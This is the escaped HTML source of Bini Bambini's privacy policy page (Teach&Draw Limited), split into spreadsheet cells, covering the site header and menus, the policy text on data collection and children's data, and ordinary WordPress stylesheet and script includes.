                        --&gt;_x005F_x000D_
	                                    &lt;a href="https://binibambini.com"&gt;_x005F_x000D_
		                                &lt;div class="header__logo middle-xs"&gt;_x005F_x000D_
                                                            &lt;noscript&gt;&lt;img src="https://binibambini.com/wp-content/uploads/2020/07/logo-min.svg" alt="" class="logo-min"&gt;&lt;/noscript&gt;&lt;img src='data:image/svg+xml,%3Csvg%20xmlns=%22http://www.w3.org/2000/svg%22%20viewBox=%220%200%20210%20140%22%3E%3C/svg%3E' data-src="https://binibambini.com/wp-content/uploads/2020/07/logo-min.svg" alt="" class="lazyload logo-min"&gt;_x005F_x000D_
                                                                                        &lt;noscript&gt;&lt;img src="https://binibambini.com/wp-content/uploads/2020/10/logo-text.svg" alt="" class="hidden-tablet"&gt;&lt;/noscript&gt;&lt;img src='data:image/svg+xml,%3Csvg%20xmlns=%22http://www.w3.org/2000/svg%22%20viewBox=%220%200%20210%20140%22%3E%3C/svg%3E' data-src="https://binibambini.com/wp-content/uploads/2020/10/logo-text.svg" alt="" class="lazyload hidden-tablet"&gt;_x005F_x000D_
                                                &lt;/div&gt;_x005F_x000D_
                                        &lt;/a&gt;_x005F_x000D_
                                    &lt;/div&gt;_x005F_x000D_
                &lt;div class="header__center flex-wrap middle-xs center-xs"&gt;_x005F_x000D_
                    &lt;ul class="header__soc flex-wrap"&gt;_x005F_x000D_
	                    &lt;li&gt;&lt;a</t>
  </si>
  <si>
    <t>class="header__soc-item" href="https://www.pinterest.com/BiniBambini_/" target="_blank" rel="nofollow"&gt;&lt;i class="icon icon-pinterest"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a class="header__soc-item" href="https://www.facebook.com/binibambinipage/" target="_blank" rel="nofollow"&gt;&lt;i class="icon icon-facebook"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a class="header__soc-item" href="https://www.instagram.com/bini.bambini/?hl=en" target="_blank" rel="nofollow"&gt;&lt;i class="icon icon-instagram"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a class="header__soc-item" href="https://www.youtube.com/channel/UCzNqervZjsZCgNaWLMwlOSA" target="_blank" rel="nofollow"&gt;&lt;i class="icon icon-youtube"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/li&gt;                    &lt;/ul&gt;_x005F_x000D_
                &lt;/div&gt;_x005F_x000D_
                &lt;div class="header__right flex-wrap middle-xs end-xs"&gt;_x005F_x000D_
	                                    &lt;a href="/catalog-page/" class="btn btn--blue try-it-now"&gt;Try it now&lt;/a&gt;_x005F_x000D_
_ x000D_
                    &lt;div class="header__right-item hidden-tablet"&gt;_x005F_x000D_
                        &lt;div class="header__lang"&gt;_x005F_x000D_
	                            _ x000D_
	                                                                                                        &lt;div class="js_drop dropdown"&gt;_x005F_x000D_
                                            &lt;div class="btn btn--</t>
  </si>
  <si>
    <t>light-blue"&gt;            &lt;span&gt;English&lt;/span&gt;
		 &lt;i class="icon icon-caret"&gt;&lt;/i&gt;&lt;/div&gt;_x005F_x000D_
                                             &lt;ul class="dropdown__list js_dropdown"&gt;_x005F_x000D_
                                                                                                                                                                                                                                                    &lt;li&gt;_x005F_x000D_
                                                                    &lt;a                     href="https://binibambini.com/uk/privacy-policy/" class="dropdown__item" role="button" aria-expanded="false"&gt;
								                &lt;span&gt;Українська&lt;/span&gt;
				            &lt;/a&gt;
		                                                    &lt;/li&gt;_x005F_x000D_
                                                                                                                                                                                                         &lt;li&gt;_x005F_x000D_
                                                                    &lt;a                     href="https://binibambini.com/ru/privacy-policy/" class="dropdown__item" role="button" aria-expanded="false"&gt;
								                &lt;span&gt;Русский&lt;/span&gt;
				            &lt;/a&gt;
		                                                    &lt;/li&gt;_x005F_x000D_
                                                                                                                                                &lt;/ul&gt;_x005F_x000D_
                                        &lt;/div&gt;_x005F_x000D_
                                                                                                &lt;/div&gt;_x005F_x000D_
_x005F_x000D_
	                                            &lt;/div&gt;_x005F_x000D_
                &lt;/div&gt;_x005F_x000D_
            &lt;/div&gt;_x005F_x000D_
    &lt;/header&gt;_x005F_x000D_
&lt;main class="main"&gt;
	&lt;div class="vc_row wpb_row vc_row-fluid"&gt;&lt;div class="wpb_column vc_column_container vc_col-sm-12"&gt;&lt;div class="vc_column-inner"&gt;&lt;div class="wpb_wrapper"&gt;&lt;div class='binibambini-box  container  vc_custom_1613654968800 '&gt;
	&lt;div class="wpb_text_column wpb_content_element " &gt;
		&lt;div class="wpb_wrapper"&gt;
			&lt;h1&gt;Privacy policy&lt;/h1&gt;
&lt;p&gt;Hi All,&lt;/p&gt;
&lt;p&gt;We, Teach&amp;amp;Draw Limited, a company incorporated under the laws of the Republic of Cyprus, registered address: Faneromenis, 106, 2nd floor, flat/office 201, 6031, Larnaca, Cyprus, registration number: HE385979 (hereinafter referred to as “We”, “Company”, and “Bini Bambini”), have prepared this Privacy Policy (the “Policy”) to show how responsibly and seriously we treat the privacy of information, including personal data, of our applications users and visitors of http://teachdraw.com (the “website”).&lt;/p&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>This Policy will help you understand:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;– what is personal data;&lt;/li&gt;
&lt;li&gt;– what personal data we collect;&lt;/li&gt;
&lt;li&gt;– how and why we collect it;&lt;/li&gt;
&lt;li&gt;– whom we can share personal data with;&lt;/li&gt;
&lt;li&gt;– how to contact us if you have any questions regarding personal data processing.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Personal data protection statement&lt;/b&gt;&lt;/p&gt;
&lt;p&gt; We strive to protect the privacy of personal data that we obtain and process. During data processing, the Company undertakes to take all necessary technical and regulatory action in strict compliance with applicable law and solely upon legal grounds permitting any such processing.&lt;/p&gt;
&lt;p&gt;All our applications and services that are available for use on mobile devices, personal computers, or any other platforms including the website, to the extent related to personal data processing and protection are governed by this Privacy Policy.</t>
  </si>
  <si>
    <t>Therefore, by using any of our applications and/or services you agree with this Policy.&lt;/p&gt;
&lt;p&gt;If you do not want us to collect and process information about you in accordance with this Policy, you may not, unfortunately, use our applications and/or services.&lt;/p&gt;
&lt;p&gt;When we control data collection methods and identify the goals for which such data is used, the Company becomes the “data controller” for the purposes of the EU General Data Protection Regulation (the “GDPR”), the UK Data Protection Act 2018, and any other European data protection legislation. Under the Law of Ukraine on Personal Data Protection of June 1, 2010, the Company is the “personal data owner”. We may also be the “data operator” under the 1998 Children’s Online Privacy Protection Rule (the “COPPA”).&lt;/p&gt;
&lt;p&gt;We process personal data only upon at least one of the following legitimate grounds for such processing, including but not limited to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;– you consented to your data processing;&lt;/li&gt;
&lt;li&gt;– processing is required to execute or fulfil an agreement with you (including any offer and acceptance), including when you are using our applications / services;&lt;/li&gt;
&lt;li&gt;– such processing is required under the legislation of the countries to which we provide our services or make our applications / services available;&lt;/li&gt;
&lt;li&gt;– processing is required for the purposes of any legitimate interests of the Company as the controller or third party (unless where interests pertaining to fundamental rights and freedoms of the data subject that require data protection prevail over the above interests).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;At the same time, please note that we do not request special categories of personal data of our users /</t>
  </si>
  <si>
    <t>visitors.&lt;/p&gt;
&lt;p&gt;Please note that our Privacy Policy may be updated from time to time, including if required by applicable law. We suggest that you might want to review this Policy from time to time to see if there are any modifications. Your continued use of the applications or services after this Policy has been updated means your consent to such update.</t>
  </si>
  <si>
    <t>If you do not agree to the updates, you may refuse to use our applications / services (in particular, by removing the applications from your devices).&lt;/p&gt;
&lt;p&gt; Anyway, you can always delete or re-install an application on your mobile device to delete or change the personal data accordingly.&lt;/p&gt;
&lt;p&gt;&lt;b&gt;How we obtain personal data&lt;/b&gt;&lt;/p&gt;
&lt;p&gt; The Company may obtain your data from various sources and with various aims, including, without limitation:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;– when you play our games or use other services in applications or on the website;&lt;/li&gt;
&lt;li&gt;– when you make a purchase through our applications (such as a PRO plan of an application or certain game characters);&lt;/li&gt;
&lt;li&gt;– when you create an account on our website;&lt;/li&gt;
&lt;li&gt;– when you watch ads in our applications;&lt;/li&gt;
&lt;li&gt;– when you subscribe to our promotional mailing;&lt;/li&gt;
&lt;li&gt;– when you contact our user support centre;&lt;/li&gt;
&lt;li&gt;– when you talk to other users of our applications in a special chat;&lt;/li&gt;
&lt;li&gt;– when you apply for a job (send your CV using any communication channel).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Our applications can gather information based on the analysis of actions taken during their use.&lt;/p&gt;
&lt;p&gt;&lt;b&gt;What personal data we collect and process&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;(A)</t>
  </si>
  <si>
    <t>The following information about you can be collected and processed by our applications and/or services used by you, including the website:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;– geo location (country, state or region, GPS location);&lt;/li&gt;
&lt;li&gt;– device information (such as device name / model, operating system, browser information, including browser type and language settings);&lt;/li&gt;
&lt;li&gt;– device IDs and advertisement ID (if authorised by the user);&lt;/li&gt;
&lt;li&gt;– game progress and activities (such as remembering the language selected by the user and level of difficulty at a certain stage of use);&lt;/li&gt;
&lt;li&gt;– Information that we collect using cookies and similar technologies (please read our separate &lt;a href="/cookie-policy/"&gt;Cookie Policy&lt;/a&gt;).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;(B) The following information can be provided by you to use or our partners (third parties) during the use of our applications, services, and website:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;– age;&lt;/li&gt;
&lt;li&gt;– name;&lt;/li&gt;
&lt;li&gt;– contact details (such as email or phone number);&lt;/li&gt;
&lt;li&gt;– images / photos;&lt;/li&gt;
&lt;li&gt;– social media profiles;&lt;/li&gt;
&lt;li&gt;– bank / credit card details;&lt;/li&gt;
&lt;li&gt;– work experience and skills (CV).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;(C) In addition to the above, we can also process other personal data, if you voluntarily submit it to the Company.&lt;/p&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>However, if data processing is not required for using our applications and/or services by you, or is not explicitly required by law, we will delete it.&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Children’s data&lt;/b&gt;&lt;/p&gt;
&lt;p&gt; We treat a user / customer as a child if they are under 13 years of age, unless different age limitations apply in their country (in certain countries these are individuals under 16).&lt;/p&gt;
&lt;p&gt; We do not intentionally collect and process children’s personal data.</t>
  </si>
  <si>
    <t>However, the Company understands that the target audience of our applications may include children, and that among its users there are probably parents with children who might be ordering services for children (such as buying a PRO plan or characters in the application).&lt;/p&gt;
&lt;p&gt;Parents or any other legitimate representatives who order the relevant services for children have to accept the terms of use of the relevant application and/or service of the Company and this Policy, and will be responsible for the accuracy of the data submitted and provision of the relevant service to the child.&lt;/p&gt;
&lt;p&gt;Acceptance of the terms of use and this Policy and continued use of any of our applications</t>
  </si>
  <si>
    <t>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 important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
&lt;/style&gt;
	&lt;link rel='stylesheet' id='fbrev_css-css'  href='https://binibambini.com/wp-content/plugins/fb-reviews-widget/static/css/facebook-review.css?ver=1.7.1' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='sb_instagram_styles-css'  href='https://binibambini.com/wp-content/plugins/instagram-feed/css/sb-instagram-2-2.min.css?ver=2.4.6' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='wp-block-library-css'  href='https://binibambini.com/wp-includes/css/dist/block-library/style.min.css?ver=5.5.11' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='contact-form-7-css'  href='https://binibambini.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.3.2' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='flexboxgrid-css'  href='https://binibambini.com/wp-content/themes/binibambini/assets/libs/flexboxgrid/dist/flexboxgrid.min.css?ver=5.5.11' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='fancybox-css'  href='https://binibambini.com/wp-content/themes/binibambini/assets/libs/fancybox/dist/jquery.fancybox.min.css?ver=5.5.11' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='select2-css'  href='https://binibambini.com/wp-content/themes/binibambini/assets/libs/select2/dist/css/select2.min.css?ver=5.5.11' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='raty-css'  href='https://binibambini.com/wp-content/themes/binibambini/assets/libs/raty-js/lib/jquery.raty.css?ver=5.5.11' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='swiper-css'  href='https://binibambini.com/wp-content/themes/binibambini/assets/libs/swiper/dist/css/swiper.min.css?ver=5.5.11' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='main-style-css'  href='https://binibambini.com/wp-content/themes/binibambini/assets/css/main.css?ver=22:55:50' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='dev-style-temporary-css'  href='https://binibambini.com/wp-content/themes/binibambini/assets/css/dev-temp.css?ver=22:55:50' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='app-css'  href='https://binibambini.com/wp-content/themes/binibambini/assets/css/app.a7b44abb.css?ver=22:55:50' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='moove_gdpr_frontend-css'  href='https://binibambini.com/wp-content/plugins/gdpr-cookie-compliance/dist/styles/gdpr-main.css?ver=4.5.8' type='text/css' media='all' /&gt;
&lt;style id='moove_gdpr_frontend-inline-css' type='text/css'&gt;
#moove_gdpr_cookie_modal,#moove_gdpr_cookie_info_bar,.gdpr_cookie_settings_shortcode_content{font-family:Nunito,sans-serif}#moove_gdpr_save_popup_settings_button{background-color:#373737;color:#fff}#moove_gdpr_save_popup_settings_button:hover{background-color:#000}#moove_gdpr_cookie_info_bar .moove-gdpr-info-bar-container .moove-gdpr-info-bar-content a.mgbutton,#moove_gdpr_cookie_info_bar .moove-gdpr-info-bar-container .moove-gdpr-info-bar-content button.mgbutton{background-color:#ff008c}#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-footer-content .moove-gdpr-button-holder a.mgbutton,#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-footer-content .moove-gdpr-button-holder button.mgbutton,.gdpr_cookie_settings_shortcode_content .gdpr-shr-button.button-green{background-color:#ff008c;border-color:#ff008c}#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-footer-content .moove-gdpr-button-holder a.mgbutton:hover,#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-footer-content .moove-gdpr-button-holder button.mgbutton:hover,.gdpr_cookie_settings_shortcode_content .gdpr-shr-button.button-green:hover{background-color:#fff;color:#ff008c}#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-close i,#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-close span.gdpr-icon{background-color:#ff008c;border:1px solid #ff008c}#moove_gdpr_cookie_info_bar span.change-settings-button.focus-g{-webkit-box-shadow:0 0 1px 3px #ff008c;-moz-box-shadow:0 0 1px 3px #ff008c;box-shadow:0 0</t>
  </si>
  <si>
    <t>1px 3px #ff008c}#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-close i:hover,#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-close span.gdpr-icon:hover,#moove_gdpr_cookie_info_bar span[data-href]&gt;u.change-settings-button{color:#ff008c}#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-left-content #moove-gdpr-menu li.menu-item-selected a span.gdpr-icon,#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-left-content #moove-gdpr-menu li.menu-item-selected button span.gdpr-icon{color:inherit}#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-left-content #moove-gdpr-menu li:hover a,#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-left-content #moove-gdpr-menu li:hover button{color:#000}#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-left-content #moove-gdpr-menu li a span.gdpr-icon,#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-left-content #moove-gdpr-menu li button span.gdpr-icon{color:inherit}#moove_gdpr_cookie_modal .gdpr-acc-link{line-height:0;font-size:0;color:transparent;position:absolute}#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-close:hover i,#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-left-content #moove-gdpr-menu li a,#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-left-content #moove-gdpr-menu li button,#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-left-content #moove-gdpr-menu li button i,#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-left-content #moove-gdpr-menu li a i,#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-tab-main .moove-gdpr-tab-main-content a:hover,#moove_gdpr_cookie_info_bar.moove-gdpr-dark-scheme .moove-gdpr-info-bar-container .moove-gdpr-info-bar-content a.mgbutton:hover,#moove_gdpr_cookie_info_bar.moove-gdpr-dark-scheme .moove-gdpr-info-bar-container .moove-gdpr-info-bar-content button.mgbutton:hover,#moove_gdpr_cookie_info_bar.moove-gdpr-dark-scheme .moove-gdpr-info-bar-container .moove-gdpr-info-bar-content a:hover,#moove_gdpr_cookie_info_bar.moove-gdpr-dark-scheme .moove-gdpr-info-bar-container .moove-gdpr-info-bar-content button:hover,#moove_gdpr_cookie_info_bar.moove-gdpr-dark-scheme .moove-gdpr-info-bar-container .moove-gdpr-info-bar-content span.change-settings-button:hover,#moove_gdpr_cookie_info_bar.moove-gdpr-dark-scheme .moove-gdpr-info-bar-container .moove-gdpr-info-bar-content u.change-settings-button:hover,#moove_gdpr_cookie_info_bar span[data-href]&gt;u.change-settings-button,#moove_gdpr_cookie_info_bar.moove-gdpr-dark-scheme .moove-gdpr-info-bar-container .moove-gdpr-info-bar-content a.mgbutton.focus-g,#moove_gdpr_cookie_info_bar.moove-gdpr-dark-scheme .moove-gdpr-info-bar-container .moove-gdpr-info-bar-content button.mgbutton.focus-g,#moove_gdpr_cookie_info_bar.moove-gdpr-dark-scheme .moove-gdpr-info-bar-container .moove-gdpr-info-bar-content a.focus-g,#moove_gdpr_cookie_info_bar.moove-gdpr-dark-scheme .moove-gdpr-info-bar-container .moove-gdpr-info-bar-content button.focus-g,#moove_gdpr_cookie_info_bar.moove-gdpr-dark-scheme .moove-gdpr-info-bar-container .moove-gdpr-info-bar-content span.change-settings-button.focus-g,#moove_gdpr_cookie_info_bar.moove-gdpr-dark-scheme .moove-gdpr-info-bar-container .moove-gdpr-info-bar-content u.change-settings-button.focus-g{color:#ff008c}#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-left-content</t>
  </si>
  <si>
    <t>#moove-gdpr-menu li.menu-item-selected a,#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-left-content #moove-gdpr-menu li.menu-item-selected button{color:#000}#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-left-content #moove-gdpr-menu li.menu-item-selected a i,#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-left-content #moove-gdpr-menu li.menu-item-selected button i{color:#000}#moove_gdpr_cookie_modal.gdpr_lightbox-hide{display:none}
&lt;/style&gt;
&lt;script type='text/javascript' src='https://binibambini.com/wp-content/plugins/fb-reviews-widget/static/js/wpac-time.js?ver=1.7.1' id='wpac_time_js-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='https://binibambini.com/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp' id='jquery-core-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='https://binibambini.com/wp-content/plugins/sitepress-multilingual-cms/res/js/jquery.cookie.js?ver=4.4.3' id='jquery.cookie-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' id='wpml-cookie-js-extra'&gt;
/* &lt;! [CDATA[ */
var wpml_cookies = {"wp-wpml_current_language":{"value":"en","expires":1,"path":"\/"}};
var wpml_cookies = {"wp-wpml_current_language":{"value":"en","expires":1,"path":"\/"}};
/* ]]&gt; */
&lt;/script&gt;
&lt;script type='text/javascript' src='https://binibambini.com/wp-content/plugins/sitepress-multilingual-cms/res/js/cookies/language-cookie.js?ver=4.4.3' id='wpml-cookie-js'&gt;&lt;/script&gt;
&lt;link rel="https://api.w.org/" href="https://binibambini.com/wp-json/" /&gt;&lt;link rel="alternate" type="application/json" href="https://binibambini.com/wp-json/wp/v2/pages/3" /&gt;&lt;link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://binibambini.com/xmlrpc.php?rsd" /&gt;
&lt;link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://binibambini.com/wp-includes/wlwmanifest.xml" /&gt; 
&lt;meta name="generator" content="WordPress 5.5.11" /&gt;
&lt;link rel='shortlink' href='https://binibambini.com/?p=3' /&gt;
&lt;link rel="alternate" type="application/json+oembed" href="https://binibambini.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fbinibambini.com%2Fprivacy-policy%2F" /&gt;
&lt;link rel="alternate" type="text/xml+oembed" href="https://binibambini.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fbinibambini.com%2Fprivacy-policy%2F&amp;#038;format=xml" /&gt;
&lt;meta name="generator" content="WPML ver:4.4.3 stt:1,45,54;" /&gt;
    &lt;style type="text/css"&gt;
        .header {
            background: #ffffff;
        }
    &lt;/style&gt;
    &lt;meta name="generator" content="Powered by WPBakery Page Builder - drag and drop page builder for WordPress.</t>
  </si>
  <si>
    <t>"/&gt;
&lt;link rel="icon" href="https://binibambini.com/wp-content/uploads/2020/11/favicon-1.ico" sizes="32x32" /&gt;
&lt;link rel="icon" href="https://binibambini.com/wp-content/uploads/2020/11/favicon-1.ico" sizes="192x192" /&gt;
&lt;link rel="apple-touch-icon" href="https://binibambini.com/wp-content/uploads/2020/11/favicon-1.ico" /&gt;
&lt;meta name="msapplication-TileImage" content="https://binibambini.com/wp-content/uploads/2020/11/favicon-1.ico" /&gt;
&lt;style type="text/css" data-type="vc_shortcodes-custom-css"&gt;.vc_custom_1613654968800{margin-top: 25px !important;}&lt;/style&gt;&lt;noscript&gt;&lt;style&gt; .wpb_animate_when_almost_visible { opacity: 1; }&lt;/style&gt;&lt;/noscript&gt;_x005F_x000D_
    &lt;!--[if IE]&gt;_x005F_x000D_
    &lt;meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"/&gt;_x005F_x000D_
    &lt;!</t>
  </si>
  <si>
    <t>[endif]--&gt;_x005F_x000D_
    &lt;meta name="description" content=""&gt;_x005F_x000D_
    &lt;meta name="keywords" content=""&gt;_x005F_x000D_
&lt;!--    &lt;link rel="stylesheet" href="css/main.css"&gt;--&gt;_x005F_x000D_
&lt;/head&gt;_x005F_x000D_
&lt;body class="privacy-policy page-template page-template-main_pb page-template-main_pb-php page page-id-3 wp-custom-logo wp-embed-responsive wpb-js-composer js-comp-ver-6.3.0 vc_responsive"&gt;_x005F_x000D_
&lt;noscript&gt;_x005F_x000D_
    &lt;div class="off-js"&gt;_x005F_x000D_
        &lt;strong&gt; Для полной функциональности этого сайта необходимо включить JavaScript.&lt;/strong&gt;_x005F_x000D_
        Вот &lt;a href="https://artjoker.ua/ru/blog/how-to-enable-javascript/" target="_blank"&gt;инструкции&lt;/a&gt;, как включить JavaScript в вашем браузере._x005F_x000D_
    &lt;/div&gt;_x005F_x000D_
&lt;/noscript&gt;_x005F_x000D_
&lt;!--[if lt IE 11]&gt;_x005F_x000D_
&lt;p class="oldBrowser"&gt;Ваш браузер устарел, пожалуйста &lt;b&gt;обновите&lt;/b&gt; его.&lt;/p&gt;_x005F_x000D_
&lt;!</t>
  </si>
  <si>
    <t>[endif]--&gt;_x005F_x000D_
&lt;div class="page-wrapper"&gt;_x005F_x000D_
    &lt;span class="go-to-top"&gt;_x005F_x000D_
         &lt;i class="icon icon-arr-r-bold1"&gt;&lt;/i&gt;_x005F_x000D_
    &lt;/span&gt;_x005F_x000D_
     &lt;</t>
  </si>
  <si>
    <t>header class="header"&gt;_x005F_x000D_
        &lt;div class="container flex-wrap"&gt;_x005F_x000D_
                &lt;div class="header__left flex-wrap middle-xs"&gt;_x005F_x000D_
                    &lt;div class="mob-btn"&gt;_x005F_x000D_
                        &lt;button class="button-reset menu-trigger js_open-main-menu"&gt;_x005F_x000D_
                            &lt;div&gt;&lt;/div&gt;&lt;div&gt;&lt;/div&gt;&lt;div&gt;&lt;/div&gt;_x005F_x000D_
                        &lt;/button&gt;_x005F_x000D_
                        &lt;div class="menu-dropdown main-navigation-mobile"&gt;_x005F_x000D_
                            &lt;div class="menu-dropdown__header"&gt;_x005F_x000D_
                                &lt;button class="button-reset menu-trigger js_open-main-menu"&gt;_x005F_x000D_
                                    &lt;div&gt;&lt;/div&gt;&lt;div&gt;&lt;/div&gt;&lt;div&gt;&lt;/div&gt;_x005F_x000D_
                                &lt;/button&gt;_x005F_x000D_
                                &lt;div class="menu-dropdown__header-bottom flex-wrap between-xs middle-xs"&gt;_x005F_x000D_
                                    &lt;div class="page-title color--white menu-dropdown__header-title"&gt;Menu&lt;/div&gt;_x005F_x000D_
                                    &lt;div class="header__lang"&gt;_x005F_x000D_
                                        &lt;div class="js_drop dropdown"&gt;_x005F_x000D_
                                                                                        &lt;div class="btn btn--light-blue"&gt;English &lt;i class="icon icon-caret"&gt;&lt;/i&gt;&lt;/div&gt;_x005F_x000D_
                                                                                            &lt;ul class="dropdown__list js_dropdown"&gt;_x005F_x000D_
                                                                                                                                                                                                                            &lt; li&gt;&lt;a href="https://binibambini.com/uk/privacy-policy/" class="dropdown__item"&gt;Українська&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
                                                                                                                                                                    &lt;li&gt;&lt;a href="https://binibambini.com/ru/privacy-policy/" class="dropdown__item"&gt;Русский&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
                                                                                                    &lt;/ul&gt;_x005F_x000D_
                                                                                    &lt;/div&gt;_x005F_x000D_
                                    &lt;/div&gt;_x005F_x000D_
                                &lt;/div&gt;_x005F_x000D_
                            &lt;/div&gt;_x005F_x000D_
	                        	                        &lt;ul class="menu-dropdown__list menu"&gt;&lt;li id="menu-item-1139" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1139 nav-link"&gt;&lt;a class="menu-dropdown__item" href="https://binibambini.com/about/"&gt;About us&lt;i class="icon icon-arr-r-bold"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-1142" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1142 nav-link"&gt;&lt;a class="menu-dropdown__item" href="https://binibambini.com/catalog-page/"&gt;Our apps&lt;</t>
  </si>
  <si>
    <t>i class="icon icon-arr-r-bold"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-1140" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1140 nav-link"&gt;&lt;a class="menu-dropdown__item" href="https://binibambini.com/career/"&gt;Careers&lt;i class="icon icon-arr-r-bold"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-1141" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1141 nav-link"&gt;&lt;a class="menu-dropdown__item" href="https://binibambini.com/contacts/"&gt;Contacts&lt;i class="icon icon-arr-r-bold"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-3899" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-3899 nav-link"&gt;&lt;a class="menu-dropdown__item" href="/category/blog/"&gt;Blog&lt;i class="icon icon-arr-r-bold"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;	                                                &lt;/div&gt;_x005F_x000D_
                    &lt;/div&gt;_x005F_x000D_
                        &lt;!--_x005F_x000D_
                            &lt;div class="header__logo"&gt;&lt;/div&gt;_x005F_x000D_
                        --&gt;_x005F_x000D_
	                                    &lt;a href="https://binibambini.com"&gt;_x005F_x000D_
		                                &lt;div class="header__logo middle-xs"&gt;_x005F_x000D_
                                                            &lt;noscript&gt;&lt;img src="https://binibambini.com/wp-content/uploads/2020/07/logo-min.svg" alt="" class="logo-min"&gt;&lt;/noscript&gt;&lt;img src='data:image/svg+xml,%3Csvg%20xmlns=%22http://www.w3.org/2000/svg%22%20viewBox=%220%200%20210%20140%22%3E%3C/svg%3E' data-src="https://binibambini.com/wp-content/uploads/2020/07/logo-min.svg" alt="" class="lazyload logo-min"&gt;_x005F_x000D_
                                                                                        &lt;noscript&gt;&lt;img src="https://binibambini.com/wp-content/uploads/2020/10/logo-text.svg" alt="" class="hidden-tablet"&gt;&lt;/noscript&gt;&lt;img src='data:image/svg+xml,%3Csvg%20xmlns=%22http://www.w3.org/2000/svg%22%20viewBox=%220%200%20210%20140%22%3E%3C/svg%3E' data-src="https://binibambini.com/wp-content/uploads/2020/10/logo-text.svg" alt="" class="lazyload hidden-tablet"&gt;_x005F_x000D_
                                                &lt;/div&gt;_x005F_x000D_
                                        &lt;/a&gt;_x005F_x000D_
                                    &lt;/div&gt;_x005F_x000D_
